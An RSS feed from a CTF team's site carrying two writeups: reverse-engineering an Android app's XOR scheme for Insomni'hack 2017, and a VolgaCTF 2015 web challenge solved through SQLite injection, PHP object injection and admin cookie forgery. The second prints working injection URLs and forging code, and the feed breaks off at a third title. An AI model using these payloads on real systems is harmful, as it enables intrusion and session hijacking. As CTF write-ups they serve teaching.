<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="https://ctfcrew.org" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>BalalaikaCr3w</title>
<link>https://ctfcrew.org</link>
<description></description>
<language>en</language>
<item>
<title>Insomni'hack 2017 teaser mindreader writeup</title>
<link>https://ctfcrew.org/writeup/104</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/mobile">mobile</a></div><div class="field-item odd"><a href="/categories/web">web</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/38">Insomni&#039;hack teaser 2017</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even">
<p><em>Machines infected lots of Android smartphones and try to collect information on human behaviour... Have a look to their application and try to steal information on them.</em></p>
<p>So we have an Android application file. Let's decompile its code!</p>
<p>First, we need to translate the Dalvik bytecode to equivalent Java bytecode. I used <a href="https://github.com/google/enjarify">enjarify</a> for this:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ git clone https://github.com/google/enjarify
➜ cd enjarify
➜ ./enjarify.sh ../mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk -o ../app.jar</pre>
<p>Now we can decompile the Java bytecode with <a href="http://jd.benow.ca">jd-gui</a>. Let's see what we have.</p>
<p>The first interesting function is <em>readMind</em>:</p>
<pre class="brush: java; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
static String device = "000000000000000";
...
public String readMind()
{
localObject1 = device;
String str1 = jsonify((String)localObject1); // encode to json {"device": "..."}
byte[] arrayOfByte1 = str1.getBytes();
byte[] arrayOfByte2 = new byte[arrayOfByte1.length];
localObject1 = getApplicationContext();
encrypt((Context)localObject1, arrayOfByte1, arrayOfByte2);
int i = 0;
localObject1 = null;
String str2 = Base64.encodeToString(arrayOfByte2, 0);
... // Send HTTP-request with str2 as parameter to server
}
</pre>
<p>Here we can see that the JSON string <em>{"device": "000000000000000"}</em> is encrypted, base64-encoded and then sent to the server. The <em>encrypt</em> function looks like this:</p>
<pre class="brush: java; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
public native int encrypt(Context paramContext, byte[] paramArrayOfByte1, byte[] paramArrayOfByte2);</pre>
<p>And above it we have these lines:</p>
<pre class="brush: java; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
static
{
System.loadLibrary("native-lib");
}
</pre>
<p>As we can see, the <em>encrypt</em> function is implemented in the library <em>libnative-lib.so</em>. Let's find it.</p>
<p>First, we should extract the application files. I used <a href="https://ibotpeaches.github.io/Apktool">apktool</a> for this:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ apktool d mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk
➜ cd mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516/lib/armeabi
➜ file libnative-lib.so
libnative-lib.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /system/bin/linker, BuildID[sha1]=f092f48095eec3cb0c6dd8eddec9994c2b3e01b4, stripped
</pre>
<p>Now we should find the <em>encrypt</em> function in this library. As <em>encrypt</em> is called from Java code, it has to go through JNI (Java Native Interface). So, according to the <a href="https://docs.oracle.com/javase/1.5.0/docs/guide/jni/spec/design.html">Oracle documentation</a>, the name of the <em>encrypt</em> function in the library will be <em>Java_ch_scrt_hiddenservice_MainActivity_encrypt</em> (<em>ch.scrt.hiddenservice</em> is the application package name, <em>MainActivity</em> the class name).</p>
<p>In IDA Pro this function looks like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int a1, int a2, int a3, int a4, int a5)
{
int v5; // ST1C_4@1
int v6; // r4@1
int v7; // r6@1
unsigned int v8; // r0@1
char v9; // r5@3
int v10; // r1@3
int v12; // [sp+8h] [bp-34h]@1
int v13; // [sp+10h] [bp-2Ch]@1
int v14; // [sp+14h] [bp-28h]@1
int v15; // [sp+18h] [bp-24h]@2
int v16; // [sp+1Ch] [bp-20h]@1
int v17; // [sp+20h] [bp-1Ch]@1
char v18; // [sp+24h] [bp-18h]@1
__int16 v19; // [sp+28h] [bp-14h]@1
char v20; // [sp+2Ah] [bp-12h]@1
char v21; // [sp+2Bh] [bp-11h]@1
int v22; // [sp+2Ch] [bp-10h]@4
v14 = a4;
v5 = a3;
v6 = a1;
v13 = a1;
v7 = 0;
v18 = 0;
v12 = (*(int (**)(void))(*(_DWORD *)a1 + 684))();
v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)v6 + 736))(v6, v14, &amp;v18);
v16 = (*(int (__fastcall **)(int))(*(_DWORD *)v6 + 736))(v6);
sub_4A68();
v8 = sub_4AC4(v6, v5);
v19 = v8;
v20 = v8 &gt;&gt; 16;
v21 = HIBYTE(v8);
if ( v12 &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(v17 + v7);
j_j_j___aeabi_idivmod(v7, 80);
*(_BYTE *)(v16 + v7) = *((_BYTE *)&amp;v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++v7;
}
while ( v12 != v7 );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)v13 + 768))(v13, v14, v17, 0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)v13 + 768))(v13, a5, v16, 0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail();
return 0;
}
</pre>
<p>Also according to the Oracle JNI documentation, the first argument of this function is <em>JNIEnv* env</em> and the second is <em>jobject obj</em>. The rest of the arguments are the arguments from Java, i.e. <em>Context paramContext, byte[] paramArrayOfByte1, byte[] paramArrayOfByte2</em>. Now our function looks like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int paramArrayOfByte1, int paramArrayOfByte2)
{
...
paramArrayOfByte1_1 = paramArrayOfByte1;
paramContext_1 = paramContext;
env_1 = env;
env_2 = env;
v7 = 0;
v18 = 0;
v12 = (*(int (**)(void))(*(_DWORD *)env + 684))();
v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + 736))(env_1, paramArrayOfByte1_1, &amp;v18);
v16 = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + 736))(env_1);
sub_4A68();
v8 = sub_4AC4(env_1, paramContext_1);
v19 = v8;
v20 = v8 &gt;&gt; 16;
v21 = HIBYTE(v8);
if ( v12 &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(v17 + v7);
j_j_j___aeabi_idivmod(v7, 80);
*(_BYTE *)(v16 + v7) = *((_BYTE *)&amp;v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++v7;
}
while ( v12 != v7 );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + 768))(env_2, paramArrayOfByte1_1, v17, 0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + 768))(env_2, paramArrayOfByte2, v16, 0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail();
return 0;
}
</pre>
<p>Better, but still not readable because of the many calls like <em>(*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + 736))</em>, i.e. calls through an offset into the <em>JNIEnv *env</em> function table. We need to map these offsets to function names in <em>JNIEnv</em>. All JNI functions are listed <a href="http://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/functions.html">here</a>, but I found a nice IDA script, <a href="https://github.com/trojancyborg/IDA_JNI_Rename">IDA_JNI_Rename</a>, on GitHub. After using it our function looks like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int paramArrayOfByte1, int paramArrayOfByte2)
{
...
paramArrayOfByte1_1 = paramArrayOfByte1;
paramContext_1 = paramContext;
env_1 = env;
env_2 = env;
v7 = 0;
v18 = 0;
v12 = (*(int (**)(void))(*(_DWORD *)env + jni_GetArrayLength))();
v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(
env_1,
paramArrayOfByte1_1,
&amp;v18);
v16 = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(env_1);
sub_4A68();
v8 = sub_4AC4(env_1, paramContext_1);
v19 = v8;
v20 = v8 &gt;&gt; 16;
v21 = HIBYTE(v8);
if ( v12 &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(v17 + v7);
j_j_j___aeabi_idivmod(v7, 80);
*(_BYTE *)(v16 + v7) = *((_BYTE *)&amp;v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++v7;
}
while ( v12 != v7 );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
paramArrayOfByte1_1,
v17,
0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
paramArrayOfByte2,
v16,
0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail();
return 0;
}
</pre>
<p>Now we can assume that <em>paramArrayOfByte1</em> is the <em>plaintext</em> and <em>paramArrayOfByte2</em> is the <em>ciphertext</em>. Let's do some renames:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int plaintext, int ciphertext)
{
...
paramArrayOfByte1_1 = plaintext;
paramContext_1 = paramContext;
env_1 = env;
env_2 = env;
i = 0;
v18 = 0;
plaintext_len = (*(int (**)(void))(*(_DWORD *)env + jni_GetArrayLength))();
plaintext_bytes = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(
env_1,
paramArrayOfByte1_1,
&amp;v18);
ciphertext_bytes = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(env_1);
sub_4A68();
some_int = sub_4AC4(env_1, paramContext_1);
some_int_1 = some_int;
v20 = some_int &gt;&gt; 16;
v21 = HIBYTE(some_int);
if ( plaintext_len &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(plaintext_bytes + i);
j_j_j___aeabi_idivmod(i, 80);
*(_BYTE *)(ciphertext_bytes + i) = *((_BYTE *)&amp;some_int_1 + i % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++i;
}
while ( plaintext_len != i );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
paramArrayOfByte1_1,
plaintext_bytes,
0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
ciphertext,
ciphertext_bytes,
0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail(_stack_chk_guard - v22);
return 0;
}
</pre>
<p>So, the encryption algorithm is like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
uint32_t some_int = sub_4AC4(env_1, paramContext_1); // 4-byte key, consumed one byte at a time
uint8_t dword_1D0F8[80] = ?;                          // 80-byte table in the library's data section
for (i = 0; i &lt; plaintext_len; i++) {
    ciphertext[i] = plaintext[i] ^ ((uint8_t *)&amp;some_int)[i % 4] ^ dword_1D0F8[i % 80];
}
</pre>
<p>Cool, but we don't have <em>some_int</em> and <em>dword_1D0F8</em>. At this point I decided that it would be easier to place a breakpoint here and just copy these values from memory, because I'm lazy :). To do this I used the Android emulator (<em>armeabi-v7a</em>):</p>
<p>Start the emulator with the command:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ emulator -avd Nexus_5_API_24
</pre>
<p>Then install the application by dragging and dropping the APK file onto the emulator.</p>
<p><img alt="" height="569" src="/sites/default/files/writeups/images/emulator.png" width="892" /></p>
<p>After that I set up the IDA Dalvik debugger as described <a href="https://www.hex-rays.com/products/ida/support/tutorials/debugging_dalvik.pdf">here</a> and placed a breakpoint on the <em>encrypt</em> call in the <em>readMind</em> function:</p>
<p><img alt="" height="405" src="/sites/default/files/writeups/images/dalvik_breakpoint.png" width="1200" /></p>
<p>Then I opened another IDA instance with <em>libnative-lib.so</em>, set up the remote Android debugger as described <a href="https://finn.svbtle.com/remotely-debugging-android-binaries-in-ida-pro">here</a> and placed a breakpoint just before the encryption loop starts:</p>
<p><img alt="" height="694" src="/sites/default/files/writeups/images/arm_breakpoint.png" width="990" /></p>
<p>After that I ran IDA with the Dalvik debugger and waited until the program stopped; then I ran the remote Android debugger and attached it to the application process:</p>
<p style="text-align: center;"><img alt="" height="622" src="/sites/default/files/writeups/images/attach.png" width="581" /></p>
<p>Next I pressed continue in the first IDA instance (Dalvik debugger) and waited until the breakpoint fired in the second instance.</p>
<p><img alt="" height="349" src="/sites/default/files/writeups/images/break.png" width="1200" /></p>
<p>Ok, let's just find the values of <em>some_int</em> and <em>dword_1D0F8</em>.</p>
<p><em>dword_1D0F8</em> (starting with <em>7E 66 31 05</em>):</p>
<p style="text-align: center;"><img alt="" height="192" src="/sites/default/files/writeups/images/hex.png" width="491" /></p>
<p>and <em>some_int = 0xb1342c3a</em>:</p>
<p style="text-align: center;"><img alt="" height="197" src="/sites/default/files/writeups/images/stack.png" width="333" /></p>
<p>Ok, now we can rewrite the encryption in Python:</p>
<pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
import json
import base64

# the 80-byte table dumped from dword_1D0F8 in the debugger
table = [
0x7e, 0x66, 0x31, 0x05, 0x11, 0x22, 0x2b, 0x1f,
0x07, 0x74, 0x58, 0x19, 0x21, 0x16, 0x17, 0x05,
0x56, 0x52, 0x09, 0x22, 0x7f, 0x61, 0x25, 0x1f,
0x25, 0x13, 0x32, 0x33, 0x2a, 0x32, 0x32, 0x22,
0x28, 0x51, 0x13, 0x27, 0x5b, 0x62, 0x26, 0x1e,
0x20, 0x01, 0x0f, 0x09, 0x57, 0x1d, 0x14, 0x1e,
0x39, 0x17, 0x1d, 0x19, 0x03, 0x50, 0x12, 0x12,
0x02, 0x62, 0x1a, 0x7a, 0x0f, 0x4f, 0x26, 0x20,
0x02, 0x32, 0x11, 0x11, 0x57, 0x3d, 0x2e, 0x33,
0x0b, 0x14, 0x16, 0x0e, 0x1b, 0x60, 0x1c, 0x02,
]
# the four bytes of some_int = 0xb1342c3a as they sit on the stack (little-endian)
crc = [ 0x3a, 0x2c, 0x34, 0xb1 ]

def encrypt(p):
    # p is bytes; every plaintext byte is XORed with one byte of the 4-byte key
    # and one byte of the 80-byte table, both selected by position
    return bytes(p[i] ^ crc[i % 4] ^ table[i % len(table)] for i in range(len(p)))

def encode(data):
    # compact separators match the JSON the app produces (no spaces)
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.b64encode(encrypt(raw)).decode("ascii")
</pre>
<p>To check it I intercepted the HTTP request from the emulator and got:</p>
<pre class="brush: plain; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
GET /?a=1&amp;c=P2hh0V1nfMsfYk6YKwoThFxODaN1fSGeLw8k%2Fw%3D%3D%0A HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; sdk_google_phone_armv7 Build/NYC)
Host: mindreader.teaser.insomnihack.ch
Connection: close
</pre>
<p>So we can check the correctness of the Python script as follows:</p>
<pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
test_in = b'{"device":"000000000000000"}'
test_out = base64.b64decode("P2hh0V1nfMsfYk6YKwoThFxODaN1fSGeLw8k/w==")
assert encrypt(test_in) == test_out
</pre>
<p>The script was correct, so I decided to try all the requests the application makes:</p>
<pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
import requests

URL = "http://mindreader.teaser.insomnihack.ch"

def read_mind(device_id):
    # action a=1: the request sent by readMind()
    data = {
        "device": device_id
    }
    params = {
        "a": 1,
        "c": encode(data)
    }
    r = requests.get(URL, params=params)
    return r

def sms_send(device_id, date, sender, body):
    # action a=2: the request sent by SMSReceiver
    data = {
        "device": device_id,
        "date": date,
        "sender": sender,
        "body": body
    }
    params = {
        "a": 2,
        "c": encode(data)
    }
    r = requests.get(URL, params=params)
    return r
</pre>
<p>The <em>sms_send</em> request I found in the file <em>SMSReceiver.java</em> in JD-GUI.</p>
<p>After playing a little bit with these two requests I found that the <em>sender</em> parameter in <em>sms_send</em> is vulnerable to (time-based) SQL injection. So after getting all the necessary table names and column names I got the flag:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ python solve.py
INS{N00bSmS_M1nD_r3ad1nG_TecH}
</pre>
<p>Full script solve.py (LINK!)</p>
</div></div></div><div class="field field-name-field-file field-type-file field-label-above"><div class="field-label">Attachments:&nbsp;</div><div class="field-items"><div class="field-item even"><span class="file"><img class="file-icon" alt="Binary Data" title="application/octet-stream" src="/modules/file/icons/application-octet-stream.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk" type="application/octet-stream; length=2457613">mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk</a></span></div><div class="field-item odd"><span class="file"><img class="file-icon" alt="Plain text icon" title="text/plain" src="/modules/file/icons/text-plain.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/solve.py_0.txt" type="text/plain; length=2961">solve.py.txt</a></span></div></div></div></description>
<pubDate>Mon, 23 Jan 2017 13:46:15 +0000</pubDate>
<dc:creator>russtone</dc:creator>
<guid isPermaLink="false">104 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/104#comments</comments>
</item>
<item>
<title>Web2 writeup</title>
<link>https://ctfcrew.org/writeup/101</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/web">web</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/34">Volga CTF 2015 Quals</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>This is the Web2 problem</p><p>The challenge simply states "Find the key!" and it gives us the challenge URL.<br>The first thing I usually do with a web challenge is to run dirbuster, spider the target and check the it with Nmap.&nbsp;</p><p>Checking with Nmap didn't result in anything interesting. However dirbuster did. I found two interesting folders.<br>The first one is "SecretAdminPanel" and the second one was "logs"</p><p>I visited "SecretAdminPanel" and I saw this.</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-05-05%20at%209.29.59%20PM.png" alt="" width="1200" height="762"></p><p>So our goal is basically try to access this "SecretAdminPanel".<br>I then visited the "logs" folder, and I found that my IP got logged with the parameters I submitted to the page (so far no params).&nbsp;<br>I visited the SecretAdminPanel again and submitted some data through the GET request&nbsp;</p><p>web2.2015.volgactf.ru/SecretAdminPanel?test=test</p><p>I saw this message: "Don't attempt to hack, all requests will be logged."&nbsp;<br>Well this, in CTFs, This message simply means: HACK from here.</p><p>At the beginning I though that we will have SQLi in the INSERT statement in our request. 
I thought it will SQLi in the IP by injecting in the X-Forwarded-For or Client-IP request Headrs.<br>I tried SQLi there but didn't get any result.&nbsp;<br><br>Then probably in the params.&nbsp;<br>I tried the following request:&nbsp;http://web2.2015.volgactf.ru/SecretAdminPanel?test=test%27<br>and I got&nbsp;<strong>Error:</strong>&nbsp;unrecognized token: "";}')"<br>Interesting we have some errors available. looks like SQLi and my request was NOT logged. This means we probably had SQLi error and the request didn't finish processing due to the error.<br>I tried this one to double-check<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test=test%27%27<br>and I got no errors and the request got logged perfectly.&nbsp;<br><br><strong>Exploitation:&nbsp;</strong><br>Now it is the time to exploit. I managed to know that th DBMS was sqlite. So this what I want to exploit: a SQLite database.&nbsp;<br>I am injecting in an insert statement and I am injecting in the last column.&nbsp;<br>I believe that the query in the backend was something like<br><br>query = INSERT INTO logs (IP, PARAMS) VALUES ($ip, $params);</p><p>I usually when I have a SQLi bug and errors are enabled. I try to inject in different places in the query to see the errors of the database. As a result of seeing the errors I can see part of the query in the backend.<br>So I injected in this part of the query string&nbsp;<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test%27=test<br>and that was the result&nbsp;<br><strong>Error:</strong>&nbsp;near "";s:4:"": syntax error<br>what we see here part of the INSERT query but we can see s:4: and this is part of a serialized string in PHP.<br>So probably the code in the backend something like this&nbsp;<br><br>$params = serialize($_GET)<br>query = "INSERT INTO logs (IP, PARAMS) VALUES ($'ip', '$params');"</p><p>now we want to have our injection with the serialization. 
I frist looked for the string concatenation operator in the SQLite to concatenate the result I want to see with the params. The string concatenation operator was "||"/<br>I tried this request first&nbsp;<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test=test'||(Select "a")||'</p><p>The request worked successfully no SQL errors, this means our injection was correct.&nbsp;<br>However I checked the logs page and that was the result&nbsp;</p><p>array(2) {</p><p>&nbsp; ["ip"]=&gt;</p><p>&nbsp; string(12) "MY_IP"</p><p>&nbsp; ["params"]=&gt;</p><p>&nbsp; bool(false)</p><p>&nbsp;</p><p>}</p><p>Why is this ?? It looks like that PHP couldn't deserialize the column correctly.&nbsp;<br>What they do in the backend something similar to this&nbsp;<br><br>SELECT IP, params from logs where IP = MyIP;<br>$params = unserialize(params)<br>var_dump($params)</p><p>so we have a problem in deserializing our data.&nbsp;<br>This is true because our injection was something like<br>?test=test'||(Select "a")||'</p><p>So the serialized string:&nbsp;'a:1:{s:4:"test";s:22:"test'||(Select "a")||'";}'<br>and the string stored in the database: 'a:1:{s:4:"test";s:22:"testa";}'<br>This&nbsp;discrepancy between the INSERT statement and what stores in the database cause this error.</p><p>To solve this, I used something like repeat and substring functions in sqlite to have valid serialized string and stored correctly in the database.&nbsp;<br><br>That was my final query&nbsp;<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28SELECT%28substr%28group_concat%28name%29,0,5%29%29FROM%28sqlite_master%29%29||%28select%28replace%28substr%28quote%28zeroblob%28%28130%2b1%29/2%29%29,3,130%29,%220%22,%22a%22%29%29%29||%27</p><p><br>Executing this query will return us the names of tables in the database.<br>This query to extract the content of the params column in the 
database<br><br>http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28SELECT%28hex%28substr%28group_concat%28params%29,100,61%29%29%29FROM%28logs%29%29||%28select%28replace%28substr%28quote%28zeroblob%28%289%2b1%29/2%29%29,3,9%29,%220%22,%22a%22%29%29%29||%27</p><p>I assumed we would get the parameters the admin used to log in to this page, and with them the flag. However, it was not that easy.<br>Unfortunately, the only data in the database was mine, which means that each user has their own copy of the database.<br>The flag will not be in the database, so we need to think of something else.<br><br>In the cookies we have this interesting cookie:&nbsp;PHPSESS=%7B%22isAdmin%22%3Afalse%7D0afb5cf5c7d66587da7c811767250458; expires=Fri, 08 May 2015 18:08:16 GMT; path=/; domain=.web2.2015.volgactf.ru; HttpOnly</p><p>Perhaps to get the flag we need to recover the cookie salt used to sign this cookie and then forge a valid cookie with isAdmin:true.<br>Another team member suggested storing a serialized Exception object in the logs: when the logs page unserializes it, we will see a stack trace and might get something useful.<br><br>I used this query to add the Exception object into the database:<br><br></p><p><a class="vt-p" style="text-decoration: underline;" href="http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0:{}}">http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0:{}}</a></p><p>When we viewed the logs page we indeed saw the stack trace, and part of the output contained this:<br><br>object(Session)#3 (2) {<br>["cookieSalt":"Session":private]=&gt;<br>string(20) "nO97M0Za6cu9wDC72VVv"<br>["params":"Session":private]=&gt;<br>array(1) {<br>["isAdmin"]=&gt;<br>bool(false)</p><p>Now we have the salt. To construct a valid cookie we simply need to do the following:</p><p>&lt;?php<br>$str='{"isAdmin":true}';<br>$salt='nO97M0Za6cu9wDC72VVv';<br>echo urlencode($str).md5($str.$salt);<br>?&gt;</p><p>and the flag was&nbsp;</p><p><span style="font-weight: bold; background-color: #b5eb5e;">{417a4c17bd3132bba864dac9edf4ae7a}</span></p><p>Notes:<br>1- I think it was worth more than 200 pts compared to the remote web challenge, or even the joy and relax challenges.<br>2- There was a much easier way to exploit the SQLi: we could simply have used stacked queries ^^. It is SQLite, so I could have added the serialized Exception object into the DB using something similar to the query below; you just need to know how to write the query without spaces, because spaces were replaced with underscores '_'.&nbsp;</p><p><a class="vt-p" style="text-decoration: underline;" href="http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0">http://web2.2015.volgactf.ru/SecretAdminPanel?test</a>');INSERT INTO logs(IP, PARAMS) VALUES ('127.0.0.1', 'O:9:"Exception":0:{}')--</p></div></div></div></description>
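Forging the session cookie in Python, as an added example that is not part of the original writeup (the author used the PHP one-liner above). It assumes the server validates the cookie by recomputing md5(json . salt) and comparing it with the trailing 32 hex characters, which is what the PHP snippet implies but the page does not show; the salt and the original cookie are the values quoted in the writeup, and the function names are mine.

```python
import hashlib
import hmac
import json
from urllib.parse import quote_plus, unquote_plus

# Values taken from the writeup: the salt leaked by the unserialized Exception's
# stack trace, and the cookie the server originally set for our session.
SALT = "nO97M0Za6cu9wDC72VVv"
OBSERVED_COOKIE = "%7B%22isAdmin%22%3Afalse%7D0afb5cf5c7d66587da7c811767250458"


def sign(params_json, salt):
    """The server's scheme as the writeup describes it: md5(json . salt)."""
    return hashlib.md5((params_json + salt).encode()).hexdigest()


def forge_cookie(params, salt):
    """Build a PHPSESS value for arbitrary params. Mirrors PHP's
    urlencode($str).md5($str.$salt); json.dumps with compact separators
    reproduces json_encode's {"isAdmin":true} layout."""
    params_json = json.dumps(params, separators=(",", ":"))
    return quote_plus(params_json) + sign(params_json, salt)


def split_cookie(cookie):
    """Split a cookie into (decoded JSON text, 32-hex digest)."""
    body, digest = cookie[:-32], cookie[-32:]
    if len(digest) != 32 or not body:
        raise ValueError("cookie too short")
    return unquote_plus(body), digest


def verify_cookie(cookie, salt):
    """What the server must do on each request (assumed; not shown on the
    page): recompute the digest and accept the params only if it matches.
    Returns the params dict, or None when the signature does not check out."""
    try:
        params_json, digest = split_cookie(cookie)
    except ValueError:
        return None
    # constant-time comparison; once the salt has leaked this no longer
    # matters, but it is the correct way to compare a MAC
    if not hmac.compare_digest(sign(params_json, salt), digest):
        return None
    return json.loads(params_json)


if __name__ == "__main__":
    admin_cookie = forge_cookie({"isAdmin": True}, SALT)
    print("PHPSESS=" + admin_cookie)
    print("server would accept:", verify_cookie(admin_cookie, SALT))
    print("original cookie parses as:", split_cookie(OBSERVED_COOKIE))
```

The security point is that the whole scheme rests on the salt staying secret: an unkeyed hash over user-controlled data is a MAC only as long as nobody can read the key, and here the key was printed by a debug dump of the session object.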
<pubDate>Fri, 08 May 2015 17:41:19 +0000</pubDate>
<dc:creator>the_storm</dc:creator>
<guid isPermaLink="false">101 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/101#comments</comments>
</item>
<item>
<title>Infosec mini ctf writeup </title>
<link>https://ctfcrew.org/writeup/99</link>
